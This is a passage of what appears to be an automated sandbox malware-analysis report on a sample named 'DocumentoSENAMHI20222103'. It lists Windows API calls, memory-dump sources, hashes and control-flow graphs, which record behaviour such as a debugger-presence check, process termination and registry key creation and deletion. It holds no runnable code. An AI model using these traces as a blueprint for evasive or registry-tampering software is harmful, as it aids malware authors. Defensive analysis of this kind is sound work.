                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00BD4C15
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                              • String ID:
                                                                              • API String ID: 2933794660-0
                                                                              • Opcode ID: 32fd872749c1cb50b50096169c2b88a4b7d4604248cb6db7c5885fb3e50a15be
                                                                              • Instruction ID: d3e09bed16fec44d371492482df3b9e768dd1d81a420682e8ffa1cf8beba3207
                                                                              • Opcode Fuzzy Hash: 32fd872749c1cb50b50096169c2b88a4b7d4604248cb6db7c5885fb3e50a15be
                                                                              • Instruction Fuzzy Hash: ADF0AF74C10248EBCB00DBB4C989A9EBBF8EF08201FA18895D512EB110DB34AB048B51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BD43FA,00BE137C), ref: 00BD42DF
                                                                              • UnhandledExceptionFilter.KERNEL32(00BD43FA,?,00BD43FA,00BE137C), ref: 00BD42E8
                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00BD43FA,00BE137C), ref: 00BD42F3
                                                                              • TerminateProcess.KERNEL32(00000000,?,00BD43FA,00BE137C), ref: 00BD42FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                              • String ID:
                                                                              • API String ID: 3231755760-0
                                                                              • Opcode ID: 25457e34ff45bb5cf595adda7560c6fe2fed21d12c01d6e467ccc46b6b935138
                                                                              • Instruction ID: 516719e60d53ccee13368024601da8eadc8bbbae63a2e17214634e49a9137a48
                                                                              • Opcode Fuzzy Hash: 25457e34ff45bb5cf595adda7560c6fe2fed21d12c01d6e467ccc46b6b935138
                                                                              • Instruction Fuzzy Hash: 0FD0EA72444288ABDB002BE9FD8DA8D3B68EB48656F244811F70ACB461DE719491CB65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BD73D8
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD73E2
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BD73EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: efb5b1d8fe48cf9283796354d7dda62d311456fa099acd1dde342f8e369cf333
                                                                              • Instruction ID: 1d191eb167547ddb7e4490448596d8c600431c186a06383d4fcd96a79222d6a5
                                                                              • Opcode Fuzzy Hash: efb5b1d8fe48cf9283796354d7dda62d311456fa099acd1dde342f8e369cf333
                                                                              • Instruction Fuzzy Hash: EB31A4759412189BCB21DF68DD89BCDBBF4BF08310F5045EAE51CA7291EB709B858F44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,00BD7B8D,?,00000000,?,?,?,00BD9C0E), ref: 00BD7BB0
                                                                              • TerminateProcess.KERNEL32(00000000,?,00BD7B8D,?,00000000,?,?,?,00BD9C0E), ref: 00BD7BB7
                                                                              • ExitProcess.KERNEL32 ref: 00BD7BC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: a1d1fbfa3ab6e9bfc095b2f673e6567cfd19a2ec8d1b89d85260f7b8aaae2fe5
                                                                              • Instruction ID: d65006291ecd30c536b4da3dcfd4df78bd7408c1cd82f0fbed57a31472885af4
                                                                              • Opcode Fuzzy Hash: a1d1fbfa3ab6e9bfc095b2f673e6567cfd19a2ec8d1b89d85260f7b8aaae2fe5
                                                                              • Instruction Fuzzy Hash: D0E04631044588AFCF116F18DE89E887BA9EB40341B1008A6F804CB232EF39DD81CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BDFA97,?,?,00000008,?,?,00BDF72F,00000000), ref: 00BDFCC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: 645827ec135f7acc3405224d5fb7794579369a8bfdb58054c5686a7f74b462fa
                                                                              • Instruction ID: 63d328542f63ad0687eb409f9aacb7b3ef05f199b0afe57166fd5f4ecc4ef643
                                                                              • Opcode Fuzzy Hash: 645827ec135f7acc3405224d5fb7794579369a8bfdb58054c5686a7f74b462fa
                                                                              • Instruction Fuzzy Hash: 7CB1713161460ADFD714CF28C486B64BBE1FF05364F2986AAE89ACF3A1D335D991CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BD478B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: FeaturePresentProcessor
                                                                              • String ID:
                                                                              • API String ID: 2325560087-0
                                                                              • Opcode ID: cc92c0e03d911aeb66aa613bd2a560cdeac7de109db1c849aefac446c9eff0d1
                                                                              • Instruction ID: 22db6ed55985c08ab7dd8851c8c9a427fed5e698aad2ab4076ed344b9850b7eb
                                                                              • Opcode Fuzzy Hash: cc92c0e03d911aeb66aa613bd2a560cdeac7de109db1c849aefac446c9eff0d1
                                                                              • Instruction Fuzzy Hash: 5251A1B19012059FDB29CF99D8957AEFBF0FB48360F14886AD455EB390E7769A00CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48a643b0c7ddc51b0f826615e458b9cf2f85b59a64b2be7ad9dbbf413ef1f70f
                                                                              • Instruction ID: 4a62542a5f609d7d09b29b2872ccea443797ae0e1094a2ebd7bd5a635a3e64fb
                                                                              • Opcode Fuzzy Hash: 48a643b0c7ddc51b0f826615e458b9cf2f85b59a64b2be7ad9dbbf413ef1f70f
                                                                              • Instruction Fuzzy Hash: 54419EB5804218AEDB20DF69DC99AEAFBF9EF45314F1442DAE40DD3311EA359E848F10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00BE12D0,00000000,00000001,00BE6250,?), ref: 00BD14CD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID:
                                                                              • API String ID: 542301482-0
                                                                              • Opcode ID: c2312f22c776ca762726b023c0d5d3035372daad7d779eb5769cd74e3fe0fd5e
                                                                              • Instruction ID: a48af7eaf6f50005130fcc506fee3e3e3e6c117c0e6bc501e9c2a12e9b791c75
                                                                              • Opcode Fuzzy Hash: c2312f22c776ca762726b023c0d5d3035372daad7d779eb5769cd74e3fe0fd5e
                                                                              • Instruction Fuzzy Hash: F2F08276200221AB87208E4EDC84D46FBECEF95BA071045AAFA09EB350D7709C40CEE5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00004AFB,00BD458F), ref: 00BD4AF4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 8cffa4210b488360874664630cee9da21b2b2b863a83606704bf32b38612f084
                                                                              • Instruction ID: 115b6149e41e27dee6bb059de8478e23592381d42393d13cf1fa648943831c80
                                                                              • Opcode Fuzzy Hash: 8cffa4210b488360874664630cee9da21b2b2b863a83606704bf32b38612f084
                                                                              • Instruction Fuzzy Hash:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: 54a2b29dcd46f0f8b73b131cb56e1093b14bf0d858fb57185f31964c751ba06e
                                                                              • Instruction ID: 199ad97e7f7cc639e6860cd953b9cdc8b54be6dbd2a199acb37cd8d996a9de16
                                                                              • Opcode Fuzzy Hash: 54a2b29dcd46f0f8b73b131cb56e1093b14bf0d858fb57185f31964c751ba06e
                                                                              • Instruction Fuzzy Hash: 51A01130A022828B83008F38BF082883BA8BA0228230080A8A008CA220EF3080208A20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
                                                                              • Instruction ID: 34a2fa6fb30f8c26dfa41d49fcdd26e534fce527cc20628dc88821be6bdfc945
                                                                              • Opcode Fuzzy Hash: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
                                                                              • Instruction Fuzzy Hash: D7E08C32A11228EBCB14DB88C904D8AF3ECEB49B40B110497F501E3200E270DE00C7D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 240 bd29e8-bd2a01 call be0216 243 bd2a07-bd2a09 240->243 244 bd2c43 240->244 243->244 245 bd2a0f-bd2a39 call bd74d0 243->245 246 bd2c48-bd2c4d call be01c5 244->246 252 bd2a3d-bd2a42 245->252 253 bd2a3b 245->253 254 bd2a4e-bd2a68 252->254 255 bd2a44-bd2a49 252->255 253->252 257 bd2a6e-bd2a74 254->257 258 bd2c2b-bd2c34 254->258 256 bd2c36-bd2c41 CoTaskMemFree 255->256 256->246 259 bd2a7a-bd2a7c 257->259 260 bd2b62-bd2b68 257->260 258->256 261 bd2a7e-bd2a8d call bd772c 259->261 262 bd2ad4-bd2ad9 259->262 263 bd2b7a-bd2b8e CharNextA call bd18a6 260->263 264 bd2b6a-bd2b77 CharNextA 260->264 278 bd2a8f-bd2a91 261->278 279 bd2ad1 261->279 267 bd2b1f-bd2b21 262->267 268 bd2adb-bd2add 262->268 263->255 277 bd2b94-bd2ba3 CharNextA 263->277 269 bd2b79 264->269 270 bd2bb7-bd2bc4 call bd22d6 264->270 267->260 273 bd2b23-bd2b29 267->273 275 bd2adf-bd2ae3 268->275 276 bd2ae5-bd2aef CharNextA 268->276 269->263 288 bd2c24-bd2c29 270->288 289 bd2bc6-bd2bcd 270->289 280 bd2b2b-bd2b2e 273->280 281 bd2b30-bd2b38 273->281 275->260 283 bd2af6-bd2b17 CharNextA * 2 call bd18a6 276->283 284 bd2af1-bd2af4 276->284 277->258 285 bd2ba9-bd2bb2 277->285 278->279 286 bd2a93-bd2ac7 CharNextA * 4 call bd1928 278->286 279->262 280->260 281->260 287 bd2b3a-bd2b42 281->287 283->255 296 bd2b1d 283->296 284->273 285->257 286->255 300 bd2acd 286->300 287->260 293 bd2b44-bd2b48 287->293 288->256 294 bd2c1d-bd2c22 289->294 295 bd2bcf-bd2bf4 call bd770f call bd1285 call bd2199 289->295 293->260 298 bd2b4a-bd2b59 call bd1928 293->298 294->256 295->288 309 bd2bf6-bd2c01 call bd1928 295->309 296->260 298->255 305 bd2b5f 298->305 300->279 305->260 309->255 312 bd2c07-bd2c09 309->312 313 bd2c14-bd2c16 312->313 314 bd2c18 313->314 315 bd2c0b-bd2c12 CharNextA 313->315 314->277 315->313
                                                                              APIs
                                                                              • CoTaskMemAlloc.OLE32(00000000,00000040,00BD2C84,?,00000000,00000000,?), ref: 00BD2A2E
                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00BD2A95
                                                                              • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00BD2A9E
                                                                              • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00BD2AA7
                                                                              • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00BD2AB0
                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00BD2AE6
                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00BD2AF8
                                                                              • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00BD2B03
                                                                              • CharNextA.USER32(00000000,}},?,?,00000000), ref: 00BD2B6A
                                                                              • CharNextA.USER32(?), ref: 00BD2B7A
                                                                              • CharNextA.USER32(?,?,00000000), ref: 00BD2B96
                                                                              • CharNextA.USER32(00000000,00000000,?,?,?,00BD1D41,?,?), ref: 00BD2C0C
                                                                              • CoTaskMemFree.OLE32(?), ref: 00BD2C39
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Task$AllocFree
                                                                              • String ID: }}$HKCR$HKCU{Software{Classes$`fru
                                                                              • API String ID: 812253343-3549797678
                                                                              • Opcode ID: 106ddf03e20fede93eed84d9b5fff19f3f2145ec9dcfff78a23381c4f84dedda
                                                                              • Instruction ID: 14c32ae7d6b83c0cde6774cf0d6718b55fb3df363b8de1429e777619e025777a
                                                                              • Opcode Fuzzy Hash: 106ddf03e20fede93eed84d9b5fff19f3f2145ec9dcfff78a23381c4f84dedda
                                                                              • Instruction Fuzzy Hash: 86716A709042C6AFDB259FA8D994AADFBF4EF25300F24049AE845EB351FB748C85CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 316 bd2da0-bd2e0b call be02c0 call bd2327 321 bd33e4-bd33ff call bd403c 316->321 322 bd2e11 316->322 324 bd33a9-bd33ac 322->324 326 bd2e16-bd2e45 lstrcmpiA * 2 324->326 327 bd33b2 324->327 328 bd2e4f-bd2e5f call bd2327 326->328 329 bd2e47-bd2e49 326->329 330 bd33d9-bd33db 327->330 328->330 336 bd2e65-bd2e6a 328->336 329->328 332 bd2f09 329->332 330->321 331 bd33dd-bd33de RegCloseKey 330->331 331->321 335 bd2f0b-bd2f19 lstrcmpiA 332->335 337 bd2f1b-bd2f31 call bd2327 335->337 338 bd2f37-bd2f45 lstrcmpiA 335->338 336->335 341 bd2e70-bd2e87 call bd22d6 336->341 337->330 337->338 339 bd2f4b-bd2f61 call bd2327 338->339 340 bd3087-bd3092 call bd22d6 338->340 339->330 350 bd2f67-bd2f77 call bd2327 339->350 352 bd33d4 340->352 353 bd3098-bd309b 340->353 351 bd2e8d-bd2e95 call bd2919 341->351 341->352 350->330 364 bd2f7d-bd2f80 350->364 367 bd2e97-bd2ebb call bd1685 351->367 368 bd2ec1-bd2ec7 351->368 352->330 356 bd31ea-bd31ee 353->356 357 bd30a1-bd30bb call bd1629 353->357 359 bd320f-bd3211 356->359 360 bd31f0-bd320d call bd1629 356->360 369 bd315e 357->369 370 bd30c1-bd30d5 call bd1629 357->370 366 bd3212-bd3254 call bd770f call bd1285 call bd2327 359->366 360->366 364->352 373 bd2f86-bd2f8a 364->373 366->330 416 bd325a-bd326a call bd297d 366->416 367->368 371 bd2ec9-bd2ed9 call bd2327 368->371 372 bd2f01-bd2f07 368->372 379 bd3164-bd3174 call bd2327 369->379 370->369 391 bd30db-bd30f9 370->391 371->330 393 bd2edf-bd2eef call bd297d 371->393 372->335 381 bd2f8c-bd2fdc call bd2440 373->381 382 bd2ff0-bd2ff4 373->382 379->330 400 bd317a-bd317d 379->400 381->330 403 bd2fe2-bd2feb 381->403 388 bd306c-bd307c call bd297d 382->388 389 bd2ff6-bd2ffd 382->389 388->330 413 bd3082 388->413 389->388 396 bd2fff-bd302c call bd1629 389->396 398 bd30fb-bd3105 call bd1348 391->398 399 bd3107-bd3112 RegCreateKeyExA 391->399 393->330 419 bd2ef5-bd2efc 393->419 414 bd33b4-bd33c4 call bd12d7 396->414 415 bd3032-bd3048 RegDeleteValueA 396->415 412 bd3118-bd311a 398->412 399->412 409 bd317f-bd319e call bd2440 400->409 410 bd31a4-bd31a7 400->410 403->410 409->330 409->410 410->324 422 bd31ad-bd31b7 call bd74d0 410->422 420 bd311c-bd3124 412->420 421 bd3146 412->421 413->324 414->330 440 bd33c6-bd33d2 RegCloseKey 414->440 423 bd304a-bd304d 415->423 424 bd3053-bd3055 415->424 416->330 439 bd3270-bd3273 416->439 419->410 428 bd3126-bd312c RegCloseKey 420->428 429 bd3132-bd3144 420->429 431 bd314c-bd314e 421->431 422->324 441 bd31bd-bd31d3 call bd2da0 422->441 423->414 423->424 433 bd3065 424->433 434 bd3057-bd305e RegCloseKey 424->434 428->429 429->431 431->379 437 bd3150-bd3159 call bd12d7 431->437 433->388 434->433 437->330 443 bd32bf-bd32c8 439->443 444 bd3275-bd327f call bd74d0 439->444 440->330 441->330 451 bd31d9-bd31e5 call bd2327 441->451 443->324 446 bd32ce-bd32d0 443->446 444->443 457 bd3281-bd329a call bd2da0 444->457 449 bd32e1-bd32e5 446->449 450 bd32d2-bd32d6 446->450 455 bd332c-bd333e call bd2948 449->455 456 bd32e7-bd32ef call bd2948 449->456 450->437 453 bd32dc 450->453 451->356 453->324 465 bd3355-bd335e 455->465 466 bd3340-bd334f RegCloseKey 455->466 456->455 467 bd32f1-bd32ff call bd2919 456->467 468 bd329c-bd32a3 457->468 469 bd32a9-bd32b9 call bd2327 457->469 465->437 470 bd3364-bd336a 465->470 466->465 467->324 477 bd3305-bd330c 467->477 468->330 468->469 469->330 469->443 470->324 473 bd336c-bd336e 470->473 473->324 476 bd3370-bd33a3 call bd1596 473->476 476->324 476->437 477->324 479 bd3312-bd332a call bd1685 477->479 479->324
                                                                              APIs
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD235A
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD236A
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2379
